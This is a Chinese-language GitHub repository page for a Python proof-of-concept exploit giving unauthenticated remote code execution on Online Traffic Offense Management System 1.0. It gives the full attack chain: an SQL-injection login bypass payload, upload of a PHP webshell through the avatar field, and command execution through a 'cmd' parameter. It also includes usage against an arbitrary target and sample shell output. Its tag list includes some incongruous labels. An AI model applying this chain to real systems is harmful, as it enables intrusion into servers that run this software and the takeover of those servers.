estebanzarate/Online-Traffic-Offense-Management-System-1.0-Unauthenticated-RCE-PoC

GitHub: estebanzarate/Online-Traffic-Offense-Management-System-1.0-Unauthenticated-RCE-PoC

针对「在线交通违规管理系统」v1.0 的未授权远程代码执行漏洞的 PoC 利用工具,实现从 SQL 注入到获取交互式 Shell 的完整攻击链。

Stars: 1 | Forks: 0

# 在线交通违规管理系统 1.0 — 未授权 RCE (PoC) ## 工作原理 1. 通过针对 `/classes/Login.php` 的 SQLi (`'' OR 1=1-- '`) 绕过登录。 2. 抓取已认证用户的配置文件字段。 3. 通过头像字段 (`/classes/Users.php?f=save`) 上传 PHP webshell。 4. 解析配置文件页面以查找上传 shell 的 URL。 5. 通过 `cmd` GET 参数发送命令,打开交互式 shell。 ## 环境要求 - Python 3 - 安装依赖: ``` python3 -m venv venv source venv/bin/activate python3 -m pip install requests beautifulsoup4 prompt_toolkit ``` ## 使用方法 ``` python3 exploit.py -u http://TARGET ``` **示例:** ``` $ python3 exploit.py -u http://10.10.10.10/management/ [*] Attempting SQLi login bypass... [+] Login bypassed [*] Fetching user info... [*] Uploading webshell... [+] Webshell uploaded [*] Locating shell... [+] Shell URL: http://10.10.10.10/management/uploads/1772076840_evil.php [+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) [+] Shell opened. Type 'exit' or Ctrl+C to quit. Shell> whoami www-data ``` ## 参考文献 - [EDB-50221](https://www.exploit-db.com/exploits/50221) - [Halit AKAYDIN 的原始 PoC](https://www.exploit-db.com/exploits/50221) ## 致谢 - **发现与原始漏洞利用:** Halit AKAYDIN (hLtAkydn) - **Python 3 移植与交互式 shell:** [Esteban Zárate](https://github.com/estebanzarate)
标签:CISA项目, Online Traffic Offense Management System, OpenVAS, PHP, PoC, Python, RCE, Webshell, Web安全, 文件上传漏洞, 无后门, 暴力破解, 未授权访问, 权限绕过, 编程工具, 网络信息收集, 网络安全, 蓝队分析, 远程代码执行, 隐私保护